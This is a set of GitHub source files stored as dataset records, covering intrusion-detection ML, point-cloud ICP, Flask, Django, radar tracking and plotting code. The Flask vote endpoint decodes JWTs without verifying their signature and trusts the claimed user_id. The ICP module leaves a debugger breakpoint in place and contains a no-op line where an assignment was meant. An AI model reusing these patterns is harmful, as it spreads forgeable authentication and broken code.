Testing for row 10\nfor i, val in models:\n print(\"For model: \", i)\n print(\"Expected: \", Y_test.iloc[9], \"\\tPredicted: \", val.predict(X_test).reshape(1, -1)[0][9])\n print()\n\n# Testing for random rows\nrandom_rows = np.random.randint(len(Y_test), size=(5))\n\nfor i, val in models:\n for j in random_rows:\n print(\"For model: \", i)\n print(\"Expected: \", Y_test.iloc[j], \"\\tPredicted: \",\n val.predict(X_test).reshape(1, -1)[0][j])\n print()\n\n# Testing for random rows\nrandom_rows = np.random.randint(len(Y_test), size=(5))\n\nfor j in random_rows:\n for i, val in models:\n print(\"For model: \", i)\n print(\"Expected: \", Y_test.iloc[j], \"\\tPredicted: \",\n val.predict(X_test).reshape(1, -1)[0][j])\n print()\n\n# locating a row given the value\n# locatedRow = Y_test.loc[Y_test['class'] == 2900]\n# print(locatedRow)\n\n\n### VOTING CLASSIFIER - ensemble\n\n# import libraries\nfrom sklearn.ensemble import VotingClassifier\n\n# # Creating the ensemble model\n# def ensembleModel(df_trainX, df_trainY, df_testX, df_testY):\n\n# voting 'hard' - majority vote based on individual models\nensemble_model = VotingClassifier(estimators=\n[\n ('KNN - ', KNN_classifier),\n ('LGR - ', LGR_classifier),\n ('BNB - ', BNB_classifier),\n ('DT - ', DTC_classifier),\n ('RF', RFC_classifier)\n],\n voting='hard')\n\n# Fitting the model on the training data\n\nimport pickle\n\ntrainned_model = ensemble_model.fit(X_train, Y_train)\n\npickle.dump(trainned_model, open('trainned_model.pkl', 'wb'))\n\n# # Predicting on the testing data\n# y_pred = ensemble_model.predict(df_testX)\n\n# # Testing for random rows\n# random_rows = np.random.randint(len(Y_test), size = (5))\n\n# for j in random_rows:\n# print (\"Expected: \", df_testY.iloc[j], \"\\tPredicted: \",val.predict(df_testX).reshape(1, -1)[0][j] )\n# print()\n\n# # Evaluating the accuracy of the model\n# accuracy = metrics.accuracy_score(df_testY, val.predict(df_testX))\n# print(f\"\\nAccuracy: {accuracy}\")\n\n# return ensemble_model\n\n\n# import streamlit as st\n# # create a title and description for the app\n# st.title('Network Intrusion Detection')\n# st.write('This system helps to detect network intrusions by monitoring network traffic in real-time.')\n\n# # create a text input field for entering the IP address or port number to monitor\n# ip_address = st.text_input('Enter the IP address or port number to monitor')\n\n# # create a checkbox to enable/disable real-time monitoring\n# real_time = st.checkbox('Enable real-time monitoring')\n\n# # create a button to start/stop monitoring\n# if st.button('Start/Stop Monitoring'):\n# if real_time:\n# # start monitoring network traffic\n# st.write('Monitoring network traffic...')\n# # code to monitor network traffic in real-time\n# else:\n# # stop monitoring network traffic\n# st.write('Stopped monitoring network traffic.')\n\n# # create a table to display network traffic data\n# traffic_data = pd.read_csv('Test_data.csv')\n# # [\n# # {'Time': '12:00 PM', 'Source IP': '192.168.1.1', 'Destination IP': '192.168.1.2',\n# # 'Protocol': 'TCP', 'Status': 'Successful'},\n# # {'Time': '12:05 PM', 'Source IP': '192.168.1.3', 'Destination IP': '192.168.1.4',\n# # 'Protocol': 'UDP', 'Status': 'Failed'},\n# # {'Time': '12:10 PM', 'Source IP': '192.168.1.5', 'Destination IP': '192.168.1.6',\n# # 'Protocol': 'TCP', 'Status': 'Successful'},\n# # ]\n\n# st.write('Network Traffic Data:')\n# #st.table(traffic_data.head())\n\n# # create a plot to visualize network traffic\n# st.write('Network Traffic Visualization:')\n# st.line_chart([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n\n# # create a section to display intrusion alerts\n# intrusion_alerts = [\n# {'Time': '12:05 PM', 'Source IP': '192.168.1.3', 'Alert': 'Unauthorized access detected'},\n# {'Time': '12:20 PM', 'Source IP': '192.168.1.7', 'Alert': 'Malware detected'},\n# ]\n\n# st.write('Intrusion Alerts:')\n# for alert in intrusion_alerts:\n# st.write(alert['Time'], '-', alert['Source IP'], '-', alert['Alert'])\n","repo_name":"sj-kemboi/NIDS_Revamped","sub_path":"NIDS_Project.py","file_name":"NIDS_Project.py","file_ext":"py","file_size_in_byte":13646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10389639491","text":"import numpy as np\nfrom typing import Tuple, Optional\nimport numpy.typing as npt\nfrom scipy.spatial.transform import Rotation\n\n\ndef icp_2d(points1: np.ndarray, points2: np.ndarray, max_iter: Optional[int] = 1, tol_threshold: Optional[float] = 0.001 ) -> Tuple[npt.NDArray[np.float32], npt.NDArray[np.float32], float, float]:\n '''points1 and points2 should be (n,2)'''\n assert points1.shape[1] == 2\n assert points2.shape[1] == 2\n\n points1_3d = np.c_[points1, np.zeros(points1.shape[0])]\n points2_3d = np.c_[points2, np.zeros(points2.shape[0])]\n\n ret_3d = icp_3d(points1_3d, points2_3d, max_iter, tol_threshold)\n\n #does this work lol\n ret_val = (ret_3d[0][:-1,:-1], ret_3d[1][:-1], ret_3d[2], ret_3d[3])\n return ret_val\n\n\ndef icp_3d(points1: np.ndarray, points2: np.ndarray, max_iter: Optional[int] = 10, tol_threshold: Optional[float] = 0.001 ) -> Tuple[npt.NDArray[np.float32], npt.NDArray[np.float32], float, float]:\n debug_print = True\n '''points1 and points2 should be (n,3)'''\n assert points1.shape[1] == 3\n assert points2.shape[1] == 3\n \n reverse = False\n\n # remove outliers from both\n centroid1 = np.mean(points1, axis=0)\n centroid2 = np.mean(points2, axis=0)\n\n distances1 = np.array([np.linalg.norm(points1[n] - centroid1) for n in range(points1.shape[0])])\n p1_p25, p1_p75 = np.percentile(distances1, [25, 75])\n p1_outlier_threshold = 2.0 * (p1_p75 - p1_p25)\n if debug_print:\n print(f\"Outlier threshold for point set 1 is {p1_outlier_threshold}.\")\n _p1_temp = []\n for i in range(distances1.shape[0]):\n if distances1[i] <= p1_p75 + p1_outlier_threshold:\n _p1_temp.append(points1[i])\n distances2 = np.array([np.linalg.norm(points2[n] - centroid2) for n in range(points2.shape[0])])\n p2_p25, p2_p75 = np.percentile(distances2, [25, 75])\n p2_outlier_threshold = 2.0 * (p2_p75 - p2_p25)\n if debug_print:\n print(f\"Outlier threshold for point set 2 is {p2_outlier_threshold}.\")\n _p2_temp = []\n for i in range(distances2.shape[0]):\n if distances2[i] <= p2_p75 + p2_outlier_threshold:\n _p2_temp.append(points2[i])\n \n if len(_p1_temp) > len(_p2_temp):\n _points1 = np.array(_p2_temp).astype(np.float32)\n _points2 = np.array(_p1_temp).astype(np.float32)\n reverse = True\n else:\n _points1 = np.array(_p1_temp).astype(np.float32)\n _points2 = np.array(_p2_temp).astype(np.float32)\n\n _points1 = 1000.0 * _points1\n _points2 = 1000.0 * _points2\n\n scale = 1.0\n transform_matrix = np.identity(3)\n \n # we're going to throw in the difference between the centroids as an initial guess for the translate vector\n centroid1 = np.mean(_points1, axis=0)\n centroid2 = np.mean(_points2, axis=0)\n translate_vector = centroid2 - centroid1\n if debug_print:\n print(f\"Estimated initial translation is {translate_vector}.\")\n\n\n last_error = None\n\n for i in range(max_iter):\n # idx of closest point in points2 for each point in points1, and distance to that point\n # this is kind of a jank way of finding closest matches but i'd really like it not to be O(n^2+), it's fine for a proof of concept\n # it wasn't fine for a proof of concept.\n # TODO: improve algorithm. Possibility: just get every point in set 1's distance from every point in set 2, O(n^2) but should be pretty fast for the set sizes we're working with\n # Then sort each of set 1's points' distances, then sort the set of all points on minimum distance for each, then use that as priority for assigning correlations\n # might still have some blind spots but definitely better than possibly letting all the low-indexed points 'hog' all of the good matches\n used_points = set()\n p1_transformed = ( scale * (transform_matrix @ _points1.T).T ) + translate_vector\n all_distances = sorted([ (p1_i, sorted([(p2_i, np.linalg.norm(p1_transformed[p1_i] - _points2[p2_i])) for p2_i in range(_points2.shape[0])], key = lambda p2_t : p2_t[1] ) ) for p1_i in range(p1_transformed.shape[0]) ], key=lambda p1_t: p1_t[1][0][1] )\n # paper that suggested scale-adaptive solution also said best results were found by forcing one-to-one matching on first iter, relaxing it afterwards\n # i'mma force it on at least the first 2 iterations\n p2_correlated = np.zeros_like(p1_transformed)\n for p1_i in all_distances:\n for point_pair in p1_i[1]:\n if point_pair[0] not in used_points:\n p2_correlated[p1_i[0]] = _points2[point_pair[0]]\n used_points.add(point_pair[0])\n break\n\n\n centroid1 = np.mean(p1_transformed, axis=0)\n centroid2 = np.mean(p2_correlated, axis=0)\n\n p1_normalized = p1_transformed - centroid1\n p2_normalized = p2_correlated - centroid2\n\n\n #sum_vals = np.array([[np.sum(p1_transformed[:,i] * p2_correlated[:,j]) for j in range(3)] for i in range(3)])\n\n #rot_matrix_solvable = np.array([ [ (sum_vals[0,0] + sum_vals[1,1] + sum_vals[2,2]), (sum_vals[1,2] - sum_vals[2,1]), (sum_vals[2,0] - sum_vals[0,2]), (sum_vals[0,1] - sum_vals[1,0]) ],\n # [ (sum_vals[1,2] - sum_vals[2,1]), (sum_vals[0,0] - sum_vals[1,1] - sum_vals[2,2]), (sum_vals[0,1] + sum_vals[1,0]), (sum_vals[2,0] + sum_vals[0,2]) ],\n # [ (sum_vals[2,0] - sum_vals[0,2]), (sum_vals[0,1] + sum_vals[1,0]),(-sum_vals[0,0] + sum_vals[1,1] - sum_vals[2,2]), (sum_vals[1,2] + sum_vals[2,1]) ],\n # [ (sum_vals[0,1] - sum_vals[1,0]), (sum_vals[2,0] + sum_vals[0,2]), (sum_vals[1,2] + sum_vals[2,1]),(-sum_vals[0,0] - sum_vals[1,1] + sum_vals[2,2]) ]] )\n\n # compute cross-covariance matrix of p1 and p2\n # getting an nxn matrix product out of two n-length arrays in numpy is p a i n\n ccov = np.mean(np.array([(p1_normalized[n].reshape(3,1) @ p2_normalized[n].reshape(1,3)) for n in range(p1_normalized.shape[0])]), axis=0)# - (np.mean(p1_transformed, axis=0).reshape(3,1) @ np.mean(_points2, axis=0).reshape(1,3))\n\n # per https://www.computer.org/csdl/journal/tp/1992/02/i0239/13rRUxEhFtD computing this matrix and getting the eigenvector corresponding to the largest eigenvalue should get you the optimal rotation to try in quaternion form\n # in other words, ✨magic happens here✨\n A_ij = ccov - ccov.T\n cyclic = np.array([A_ij[1,2],A_ij[2,0],A_ij[0,1]])\n Q = np.zeros((4,4))\n Q[0,0] = np.trace(ccov)\n Q[0,1:] = cyclic\n Q[1:,0] = cyclic\n Q[1:,1:] = ccov + ccov.T - (np.trace(ccov) * np.identity(3))\n import pdb; pdb.set_trace()\n\n eigvals, eigvecs = np.linalg.eig(Q)\n\n # scipy: Each row is a quaternion representing a rotation in SCALAR-LAST FORMAT WHYYY ARLKAHGDSHGJKHSDFB\n rotation = Rotation.from_quat(np.roll(eigvecs[eigvals.argmax()], -1)).as_matrix()\n\n # now let's get scale\n # ref https://www.sciencedirect.com/science/article/abs/pii/S1524070321000187?via%3Dihub\n \n p1_temp_rot = (rotation @ p1_normalized.T).T + centroid1\n '''\n import pdb; pdb.set_trace()\n p1_sum = np.sum(p1_temp_rot, axis=0) \n sol_matrix_a = np.zeros((4,4))\n sol_matrix_a[0,0] = np.sum(np.array([np.dot(p1_temp_rot[n], p1_temp_rot[n]) for n in range(p1_temp_rot.shape[0])]), axis=0)\n sol_matrix_a[0,1:] = p1_sum\n sol_matrix_a[1:,0] = p1_sum\n sol_matrix_a[1,1] = p1_temp_rot.shape[0]\n sol_matrix_a[2,2] = p1_temp_rot.shape[0]\n sol_matrix_a[3,3] = p1_temp_rot.shape[0]\n\n p2_sum = np.sum(p2_correlated, axis=0)\n sol_matrix_b = np.zeros((4,1))\n sol_matrix_b[0,0] = np.sum([np.dot(p1_temp_rot[n], p2_correlated[n]) for n in range(p1_temp_rot.shape[0])])\n sol_matrix_b[1:,0] = p2_sum\n\n scale_translate_solution = np.linalg.inv(sol_matrix_a) @ sol_matrix_b\n assert scale_translate_solution.shape[0] == 4\n new_scale = scale_translate_solution[0]\n new_translate = np.squeeze(scale_translate_solution[1:])\n '''\n new_centroid = np.mean(p1_temp_rot, axis=0)\n new_translate = centroid2 - new_centroid\n\n\n # get error\n p1_temp_rot = p1_temp_rot + new_translate\n error = np.mean([np.linalg.norm(p1_temp_rot[n] - p2_correlated[n]) for n in range(p1_temp_rot.shape[0])])\n print(f\"Error for iteration {i}: {error}\")\n if i > 0:\n if error > last_error:\n print(f\"Warning: Error increased since last iteration ({last_error})\" )\n\n last_error = error\n\n transform_matrix = rotation @ transform_matrix # really hope this is the right order\n translate_vector += new_translate\n \n if error <= tol_threshold:\n break\n\n if reverse:\n transform_matrix = np.linalg.inv(transform_matrix)\n translate_vector = -1 * translate_vector\n scale == 1.0/scale\n \n translate_vector = translate_vector / 1000.0\n \n return transform_matrix, translate_vector, scale, error\n\n\n\n \n\n","repo_name":"shockz0rz/ComfyUI_InterpolateEverything","sub_path":"icp_utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9214,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"52"} +{"seq_id":"14181649005","text":"from flask_restful import Resource, reqparse\nfrom flask import Flask,request\nfrom flask_jwt import jwt_required\nfrom models.vote import VoteModel\nfrom functools import wraps\nfrom functools import wraps\nfrom models.user import UserModel\nimport jwt\n\nclass Vote(Resource) :\n\n\n def user_exist(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n token = None\n if \"Authorization\" in request.headers:\n token = request.headers[\"Authorization\"].split(\" \")[1]\n\n if not token:\n return {\n \"message\": \"JWT is missing!\",\n \"data\": None,\n \"error\": \"Unauthorized\"\n }, 401\n\n else:\n return f(*args, **kwargs)\n\n return decorated\n\n\n @user_exist\n def post(self):\n data = request.get_json()\n token = request.headers[\"Authorization\"].split(\" \")[1]\n token = jwt.decode(token, verify=False)\n print(token['user_id'])\n vote = VoteModel(data['movie_id'] , data['vote'] , token['user_id'])\n\n\n\n try:\n vote.save_to_db()\n return vote.json() , 201\n except:\n return {\"message\": \"An internal error occurred :(( .\"}, 500\n\n\n\n\n\n\n","repo_name":"shakibaam/Rest-API-Crud","sub_path":"recourses/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":1281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40468361198","text":"nums = []\r\nnumber = int(input(\"Total number of elements: \"))\r\nfor i in range(number):\r\n value = int(input(\"%d element of list nums: \" % i))\r\n nums.append(value)\r\n\r\n\r\ndef partition(nums, l, h):\r\n pivot = nums[h]\r\n i = l - 1\r\n for j in range(l, h):\r\n if nums[j] <= pivot:\r\n i += 1\r\n nums[i], nums[j] = nums[j], nums[i]\r\n nums[i + 1], nums[h] = nums[h], nums[i + 1]\r\n return i + 1\r\n\r\n\r\ndef quickSork(nums):\r\n def _quickSort(nums, l, h):\r\n if l < h:\r\n pi = partition(nums, l, h)\r\n _quickSort(nums, l, pi - 1)\r\n _quickSort(nums, pi + 1, h)\r\n\r\n _quickSort(nums, 0, len(nums) - 1)\r\n\r\n\r\nquickSork(nums)\r\nprint(nums)","repo_name":"justunow/Algorithms","sub_path":"Sorting/quickSort.py","file_name":"quickSort.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4847176937","text":"import numpy as np\nimport logging\nimport data_containers as dc\nimport radar_plots as rp\n\nclass TrackManager(list):\n\n def __init__(self, gate = None, tracker_type={'filter_type': 'kalman_filter', 'dim_x': 4, 'dim_z': 2}, Tsampling=50.0e-3):\n super().__init__()\n if gate is None:\n self._gate = dc.Gate(beam=[], x=0, y=0, diffx=0.5, diffy=0.3, dx=0, dy=0, diffdx=0.65, diffdy=0.3,\n rvelocity=0, d_rvelocity = 0, razimuth=0, d_razimuth=0, rrange=0, d_rrange=0)\n #{'x': 3, 'y': 1, 'dx': 0.65, 'dy': 0.3}\n else:\n self._gate = gate\n self._Tsampling = Tsampling\n self._tracker_type = tracker_type\n self._n_of_Tracks = np.array([0])\n logging.getLogger(__name__).debug(\"__init__: A new track manager will be created with a gate:\")\n logging.getLogger(__name__).debug(\"__init__: \\t \\t %s\", self._gate)\n logging.getLogger(__name__).debug(\"__init__: \\t \\t tracker_type %s,\", self._tracker_type)\n logging.getLogger(__name__).debug(\"__init__: \\t \\t Tsampl %s, number of tracks %s\",\n self._Tsampling, self._n_of_Tracks)\n self._lst_not_assigned_detections = dc.UnAssignedDetectionList(self._Tsampling, self._gate)\n logging.getLogger(__name__).debug(\"__init__: \\t just created, number of unassigned dets %s\",\n len(self._lst_not_assigned_detections))\n\n\n def append_track(self,track):\n \"\"\" Appends an existing track to the list of tracks, a new tracking filter is also created\n alongside the track and is assigned to it.\n\n :param track:\n :type track: Track\n \"\"\"\n self._n_of_Tracks = np.append(self._n_of_Tracks,self._n_of_Tracks[-1]+1)\n self.append(track)\n\n def new_detections(self,lst_detections):\n logger = logging.getLogger(__name__)\n logger.debug(\"new_detections: Tested will be new %s detections\",\n len(lst_detections))\n logger.debug(\"new_detections: \\t \\t with MCCs from %s to %s\",\n lst_detections.get_mcc_interval()[0],\n lst_detections.get_mcc_interval()[1])\n\n aim=[]\n logger.debug(\"new_detections: In a _lst_not_assigned_detections is %s detections.\",\n len(self._lst_not_assigned_detections))\n self._lst_not_assigned_detections.remove_detections_by_mcc([0, lst_detections[0].get_mcc() - 10])\n logger.debug(\"new_detections: \\t after 10 mccs removal: %s detections.\",\n len(self._lst_not_assigned_detections))\n\n # track update loop - each new detection as assigned to an existing track\n # triggers the update cycle of the track\n for det in lst_detections:\n if self:\n logger.debug(\"new_detections, tracks exist: Currently some tracks exist in a list. Will be scrutinized. Number of tracks: %d\",\n len(self))\n for elem in self:\n if elem._active and elem._last_update != det._mcc:\n aim.append(elem.test_detection_in_gate(det))\n logger.debug(\"new_detections, tracks exist: The vector of all distances from each track's gate center, the aim, is: %5.3f\", aim[-1])\n else:\n logger.debug(\"new_detections, tracks exist: none of tracks is active or they have been updated in this mcc\")\n aim.append(0)\n if aim[-1]:\n logger.debug(\"new_detections, tracks exist: max(aim) is %5.3f pointing at the track number: %d\",max(aim),aim.index(max(aim)))\n self[aim.index(max(aim))].append_detection(det)\n logger.debug(\"new_detections, tracks exist: The detection was assigned to a track number: %d\", aim.index(max(aim)))\n self[aim.index(max(aim))].update_tracker()\n logger.debug(\"new_detections, tracks exist: track updated\")\n unassigned = False\n else:\n logger.debug(\"new_detections, tracks exist: currently tested detection doesn't fit in.\")\n unassigned = True\n else:\n unassigned = True\n aim.clear()\n\n if unassigned:\n # The detection 'det' was not assigned to an existing track, will be passed to\n # the list of unassigned detections.\n logger.debug(\"new_detections, no track exists yet. Processing detection at mcc: %d\" ,det._mcc)\n # test unassigned detections\n newly_formed_track = self._lst_not_assigned_detections.new_detection(det)\n if newly_formed_track:\n title = 'A new track created at {0}. Incomming {1} new detections, {2} unassigned '.format(det._mcc,\n len(lst_detections),\n len(self._lst_not_assigned_detections)\n )\n rp.static_track_init(3,\n lst_detections,\n self._lst_not_assigned_detections,\n det,\n newly_formed_track['best_fit_gate'],\n newly_formed_track['new_track'].get_array_trackpoints(),\n title)\n\n # a new track is started with a detection \"det\"\n self.append_track(newly_formed_track['new_track'])\n logger.debug(\"new_detections, no tracks: A new track was created. Currently %d tracks is in the list.\",len(self))\n self[-1].init_tracker(type=self._tracker_type['filter_type'],\n dim_x=self._tracker_type['dim_x'],\n dim_z=self._tracker_type['dim_z'],\n dt=self._Tsampling,\n init_x=self[-1][0].get_xy_array())\n logger.debug(\"new_detections, no tracks: tracker initialized for the new track: %s\",self[-1]._tracker)\n self[-1].start_tracker()\n logger.debug(\"new_detections, no tracks: new track's first 3 points: %s\",self[-1])\n else:\n title = 'No track created at {0}. Incomming {1} new detections, {2} unassigned '.format(det._mcc,\n len(lst_detections),\n len(self._lst_not_assigned_detections)\n )\n rp.static_track_init(3,\n lst_detections,\n self._lst_not_assigned_detections,\n None,\n None,\n None,\n title)\n else:\n # TODO: tracker update to finish here\n # The detection 'det' was assigned to an existing track and its appropriate tracker\n # needs to update.\n pass\n\n def port_data(self,requested_data):\n logger = logging.getLogger(__name__)\n if requested_data == \"track_init\":\n if self:\n logger.debug(\"track_mgmt: porting track_init data. Number of tracks: %s. The last track ported.\", self[-1])\n return self._lst_not_assigned_detections, self[-1]\n else:\n logger.debug(\"track_mgmt: porting track_init data. No track in the list, None track ported.\")\n return self._lst_not_assigned_detections, None\n if requested_data == \"tracks_array\":\n if self:\n list_of_tracks = []\n logger.debug(\"track_mgmt: porting tracks_aray data. Number of tracks: %s. The last track ported.\", len(self))\n for elem in self:\n list_of_tracks.append(elem.get_array_trackpoints())\n return list_of_tracks\n\n else:\n logger.debug(\"track_mgmt: porting tracks_aray data. No track in the list, None ported.\")\n return None\n\n def predict(self,mcc):\n for elem in self:\n if elem._last_update < mcc-10:\n elem.deactivate()\n else:\n elem.predict()\n\n\n\n","repo_name":"petrbojda/trio_ch","sub_path":"track_management.py","file_name":"track_management.py","file_ext":"py","file_size_in_byte":9059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"15819089582","text":"# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------------\n# 2_2_Create_Mask_and_Feather.py\n# Created as pure Python by Luis V on: 2019-06-19\n# Updated for toolbox use by Tom H for RDSP on: 2021-03-06\n# Updated by Darren C on: 2022-01-27\n# Python version: 2.7.14\n# ESRI version: ArcGIS Desktop 10.6.1\n# ---------------------------------------------------------------------------\n\n# =============================================================================\n# Modules - Libraries\n# =============================================================================\n\nimport os\nimport arcpy\n\naprx = arcpy.mp.ArcGISProject(\"CURRENT\")\nmframe = aprx.listLayouts(\"pro-2.8_reference_landscape_side\")[0]\narcpy.env.overwriteOutput = True\nsep = os.path.sep\n\n# Set the outputMFlag and outputZFlag environments to Disabled\narcpy.env.outputMFlag = \"Disabled\"\narcpy.env.outputZFlag = \"Disabled\"\n\n# =============================================================================\n# Setting Global Variables\n# =============================================================================\nregAdmn = arcpy.GetParameterAsText(0)\narcpy.AddMessage(' regAdmn {}'.format(regAdmn))\nlayerxDir = os.path.join(regAdmn, '3_Mapping', '31_Resources', '312_Layer_files', '3122_arcmap')\n\nlryxFile = 'test.lyr'\nregDisplay = layerxDir + sep + lryxFile\narcpy.AddMessage(' regDisplay {}'.format(regDisplay))\ndataAdmn = os.path.join(regAdmn, '2_Active_Data', '202_admn', 'reg_admn_ad0_py_s0_gadm_pp_surroundingcountries.shp')\narcpy.AddMessage(' dataAdmn {}'.format(dataAdmn))\n\naprx = arcpy.mp.ArcGISProject(\"CURRENT\")\nmFrame = aprx.listMaps(\"Main map\")[0]\nmFrame.addDataFromPath(dataAdmn)\narcpy.env.workspace = os.path.join(regAdmn, '2_Active_Data', '202_admn')\narcpy.management.ApplySymbologyFromLayer(dataAdmn,\n regDisplay,\n None, \"DEFAULT\")\n","repo_name":"mapaction/default-crash-move-folder","sub_path":"20YYiso3nn/GIS/6_Pro_Default_Files/ArcToolboxPro_DataScramble_Scripts/unused_3_1_Adding_Data_Change_Symbol.py","file_name":"unused_3_1_Adding_Data_Change_Symbol.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"18875212035","text":"from django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\nfrom django.dispatch import receiver\nfrom .models import Profile\nfrom blog.models import Comment, Notification, ChildComment, PostLikes, CommentLikes, ChildCommentLikes\n\n\n@receiver(post_save, sender=User)\ndef create_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n\n\n@receiver(post_save, sender=User)\ndef save_profile(sender, instance, **kwargs):\n instance.profile.save()\n\n\n@receiver(post_save, sender=Comment)\ndef create_parent_comment_notification(sender, instance, created, **kwargs):\n if created:\n Notification.objects.create(notification_text=instance.author.username + ' has commented on your post',\n post=instance.post, author=instance.post.author, comment=instance)\n\n\n@receiver(post_save, sender=ChildComment)\ndef create_child_comment_notification(sender, instance, created, **kwargs):\n if created:\n Notification.objects.create(notification_text=instance.author.username + ' has replied to your comment',\n post=instance.post, author=instance.parent_comment.author, child_comment=instance)\n\n\n@receiver(post_save, sender=PostLikes)\ndef create_post_like_notification(sender, instance, created, **kwargs):\n if created:\n Notification.objects.create(notification_text=instance.author.username + ' has liked your post',\n post=instance.post, author=instance.post.author, liked_post=instance)\n\n\n@receiver(post_save, sender=CommentLikes)\ndef create_comment_like_notification(sender, instance, created, **kwargs):\n if created:\n Notification.objects.create(notification_text=instance.author.username + ' has liked your comment',\n comment=instance.comment, author=instance.comment.author,\n post=instance.comment.post, liked_comment=instance)\n\n\n@receiver(post_save, sender=ChildCommentLikes)\ndef create_child_comment_like_notification(sender, instance, created, **kwargs):\n if created:\n Notification.objects.create(notification_text=instance.author.username + ' has liked your comment',\n author=instance.child_comment.author, child_comment=instance.child_comment,\n post=instance.child_comment.post, liked_child_comment=instance)\n","repo_name":"harish-gunda18/mysite","sub_path":"users/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":2471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"44047551548","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfile1 = open('../Resultats/mitjanaUsuaris.txt', 'r')\nLines = file1.readlines()\n\nx=[]\ny=[]\nfor line in Lines:\n if line.split(\",\")[0] != 'idUsuari':\n x+=[int(line.split(\",\")[0])]\n y+=[float(line.split(\",\")[1])]\n\nplt.scatter(x,y, label=\"mitjanes\", color=\"blue\", marker=\"*\", s=30)\nplt.xlabel('Usuaris')\nplt.ylabel('Mitjanes')\nplt.title('Diagrama de dispersió Usuaris')\nplt.legend()\nz = np.polyfit(x, y, 1)\np = np.poly1d(z)\nplt.plot(x,p(x),\"r--\")\nplt.savefig('../Grafics/diagramaDispersioMitjanaUsuaris.png', bbox_inches='tight')\nplt.show()\n\nfile1 = open('../Resultats/mitjanaRestaurants.txt', 'r')\nLines = file1.readlines()\n\nx=[]\ny=[]\nfor line in Lines:\n if line.split(\",\")[0] != 'idRestaurant':\n x+=[int(line.split(\",\")[0])]\n y+=[float(line.split(\",\")[1])]\n\nplt.scatter(x,y, label=\"mitjanes\", color=\"blue\", marker=\"*\", s=30)\nplt.xlabel('Restaurants')\nplt.ylabel('Mitjanes')\nplt.title('Diagrama de dispersió Restaurants')\nplt.legend()\nz = np.polyfit(x, y, 1)\np = np.poly1d(z)\nplt.plot(x,p(x),\"r--\")\nplt.savefig('../Grafics/diagramaDispersioMitjanaRestaurants.png', bbox_inches='tight')\nplt.show()","repo_name":"CescFT/SIO_Practica1_Grafiques","sub_path":"ScriptsGrafiques/dispersio.py","file_name":"dispersio.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"72856071526","text":"import ctypes\nimport logging\nimport os\n\nclass ColorizingStreamHandler(logging.StreamHandler):\n # color names to indices\n color_map = {\n 'black': 0,\n 'red': 1,\n 'green': 2,\n 'yellow': 3,\n 'blue': 4,\n 'magenta': 5,\n 'cyan': 6,\n 'white': 7,\n }\n\n #levels to (background, foreground, bold/intense)\n if os.name == 'nt':\n level_map = {\n logging.DEBUG: (None, 'cyan', True),\n logging.INFO: (None, 'blue', False),\n logging.WARNING: (None, 'magena', True),\n logging.ERROR: (None, 'red', True),\n logging.CRITICAL: ('red', 'white', True),\n }\n else:\n level_map = {\n logging.DEBUG: (None, 'cyan', True),\n logging.INFO: (None, 'blue', False),\n logging.WARNING: (None, 'magenta', False),\n logging.ERROR: (None, 'red', False),\n logging.CRITICAL: ('red', 'white', True),\n }\n csi = '\\x1b['\n reset = '\\x1b[0m'\n\n @property\n def is_tty(self):\n isatty = getattr(self.stream, 'isatty', None)\n return isatty and isatty()\n\n def emit(self, record):\n try:\n message = self.format(record)\n stream = self.stream\n if not self.is_tty:\n stream.write(message)\n else:\n self.output_colorized(message)\n stream.write(getattr(self, 'terminator', '\\n'))\n self.flush()\n except (KeyboardInterrupt, SystemExit):\n raise\n except:\n self.handleError(record)\n\n if os.name != 'nt':\n def output_colorized(self, message):\n self.stream.write(message)\n else:\n import re\n ansi_esc = re.compile(r'\\x1b\\[((?:\\d+)(?:;(?:\\d+))*)m')\n\n nt_color_map = {\n 0: 0x00, # black\n 1: 0x04, # red\n 2: 0x02, # green\n 3: 0x06, # yellow\n 4: 0x01, # blue\n 5: 0x05, # magenta\n 6: 0x03, # cyan\n 7: 0x07, # white\n }\n\n def output_colorized(self, message):\n parts = self.ansi_esc.split(message)\n write = self.stream.write\n h = None\n fd = getattr(self.stream, 'fileno', None)\n if fd is not None:\n fd = fd()\n if fd in (1, 2): # stdout or stderr\n h = ctypes.windll.kernel32.GetStdHandle(-10 - fd)\n while parts:\n text = parts.pop(0)\n if text:\n write(text)\n if parts:\n params = parts.pop(0)\n if h is not None:\n params = [int(p) for p in params.split(';')]\n color = 0\n for p in params:\n if 40 <= p <= 47:\n color |= self.nt_color_map[p - 40] << 4\n elif 30 <= p <= 37:\n color |= self.nt_color_map[p - 30]\n elif p == 1:\n color |= 0x08 # foreground intensity on\n elif p == 0: # reset to default color\n color = 0x07\n else:\n pass # error condition ignored\n ctypes.windll.kernel32.SetConsoleTextAttribute(h, color)\n\n def colorize(self, message, record):\n if record.levelno in self.level_map:\n bg, fg, bold = self.level_map[record.levelno]\n params = []\n if bg in self.color_map:\n params.append(str(self.color_map[bg] + 40))\n if fg in self.color_map:\n params.append(str(self.color_map[fg] + 30))\n if bold:\n params.append('1')\n if params:\n message = ''.join((self.csi, ';'.join(params),\n 'm', message, self.reset))\n return message\n\n def format(self, record):\n message = logging.StreamHandler.format(self, record)\n if self.is_tty:\n # Don't colorize any traceback\n parts = message.split('\\n', 1)\n 